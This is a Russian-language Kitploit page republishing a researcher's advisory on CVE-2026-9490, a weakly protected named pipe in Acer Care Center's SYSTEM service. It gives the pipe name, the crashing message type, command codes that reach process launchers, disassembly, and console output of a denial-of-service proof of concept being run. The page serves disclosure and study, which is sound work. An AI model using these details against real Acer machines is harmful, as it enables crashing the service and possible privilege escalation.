Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-9490 — Служба ACCSvc создаёт именованный канал (Named Pipe) со слабым дескриптором безопасности, который позволяет любому аутентифицированному пользователю подключаться и отправлять сообщения. При отправке специально сформированного сообщения (тип сообщения 0x03) в канал служба аварийно завершает работу с кодом выхода 1067 (ERROR_PROCESS_ABORTED). | Kitploit
Инструменты/GitHubGitHub/ugvxb/cve-2026-9490
Повышение привилегийАнализ уязвимостейЭксплуатацияОбратная инженерияТестирование на ПроникновениеАнализ Бинарных Файлов
GitHubugvxb/cve-2026-9490

CVE-2026-9490

Репозиторий
43 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Служба ACCSvc создаёт именованный канал (Named Pipe) со слабым дескриптором безопасности, который позволяет любому аутентифицированному пользователю подключаться и отправлять сообщения. При отправке специально сформированного сообщения (тип сообщения 0x03) в канал служба аварийно завершает работу с кодом выхода 1067 (ERROR_PROCESS_ABORTED).

Поделиться

CVE ID: CVE-2026-9490
Исследователь: Vo Duc Thang (ugvxb)
Благодарность: https://community.acer.com/en/kb/articles/19668

1. Краткое описание

Критическая уязвимость безопасности была обнаружена в службе Acer Care Center (ACCSvc.exe). Уязвимость позволяет любому аутентифицированному локальному пользователю вызвать аварийное завершение системной службы (отказ в обслуживании) и потенциально повысить привилегии через слабо защищённый интерфейс именованного канала (Named Pipe).

Служба, работающая с привилегиями SYSTEM (LocalSystem), предоставляет именованный канал с чрезмерно разрешительными элементами управления доступом, предоставляющими права на чтение, запись и выполнение всем аутентифицированным пользователям.


2. Детали уязвимости

2.1 Затронутый компонент

АтрибутЗначение
ПродуктAcer Care Center
КомпонентACCSvc.exe (служба ACC)
Имя службыACCSvc
Путь установкиC:\Program Files (x86)\Acer\Care Center\
Учётная запись службыLocalSystem (NT AUTHORITY\SYSTEM)
Тип запускаAUTO_START
Именованный канал\.\pipe\treadstone_service_LightMode

2.2 Уязвимость №1: Отказ в обслуживании

Описание

Служба ACCSvc создаёт именованный канал со слабым дескриптором безопасности, который позволяет любому аутентифицированному пользователю подключаться и отправлять сообщения. При отправке специально сформированного сообщения (тип сообщения 0x03) служба аварийно завершает работу с кодом выхода 1067 (ERROR_PROCESS_ABORTED).

Дескриптор безопасности (SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

Анализ SDDL

Воздействие

Обычный пользователь без каких-либо специальных привилегий может завершить системную службу ACCSvc, что приведёт к недоступности функциональности Acer Care Center.

2.3 Уязвимость №2: Потенциальное локальное повышение привилегий

Описание

Тот же слабый ACL именованного канала позволяет аутентифицированным пользователям отправлять командные сообщения, которые запускают выполнение приложений-запускаторов через CreateProcessAsUserW.

Коды команд

КомандаHex-значениеЦелевой исполняемый файл
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. Технический анализ

3.1 Анализ бинарного файла

АтрибутЗначение
ФайлACCSvc.exe
ТипPE32+ исполняемый (консоль) x86-64
Инструмент анализаRadare2

3.2 Идентифицированные ключевые функции

3.3 Параметры создания именованного канала

root@kitploit:~
Имя канала:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:        0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:        0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:     255
nOutBufferSize:    512
nInBufferSize:     512
nDefaultTimeOut:   1000ms

3.4 Логика диспетчеризации команд

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Чтение команды
0x140008b1d      lea eax, [rbx - 0x19065]       ; Вычитание базы
0x140008b23      cmp eax, 2                      ; Проверка диапазона
0x140008b26      ja  0x140008bde                 ; Переход при недопустимом значении

4. Результаты эксплуатации

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Результат: Обычный пользователь успешно вызвал сбой системной службы!


5. Оценка риска

5.1 Оценка CVSS v4.0

МетрикаЗначение
Вектор CVSS 4.0AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
Базовая оценка CVSS6.8 (Средний)

5.2 Классификации CWE

CWE IDИмя
CWE-269Некорректное управление привилегиями

6. Отказ от ответственности

Данный PoC предназначен только для образовательных целей и авторизованных исследований безопасности. Автор не несёт ответственности за любое неправомерное использование. Эксплуатация без авторизации является незаконной.

Скачать инструмент
ACEУчастникРазрешениеОценка
(D;OICI;GA;;;BG)Встроенные гости (Builtin Guests)ЗАПРЕТ ВСЕХБезопасно
(D;OICI;GA;;;AN)Анонимные (Anonymous)ЗАПРЕТ ВСЕХБезопасно
(A;OICI;GRGWGX;;;AU)Аутентифицированные пользователи (Authenticated Users)Чтение/Запись/ВыполнениеУЯЗВИМО
(A;OICI;GA;;;BA)Встроенные администраторы (Builtin Admins)РАЗРЕШИТЬ ВСЁОжидаемо
Точка входа0x14000fd4c
ФункцияАдресНазначение
fcn.140009a700x140009a70CreateNamedPipeW — создание уязвимого канала
fcn.1400075700x140007570CreateProcessAsUserW — запуск процессов
fcn.14000a8a00x14000a8a0Обработчик ReadFile
fcn.1400099500x140009950Обработчик WriteFile
fcn.1400080500x140008050Диспетчер сообщений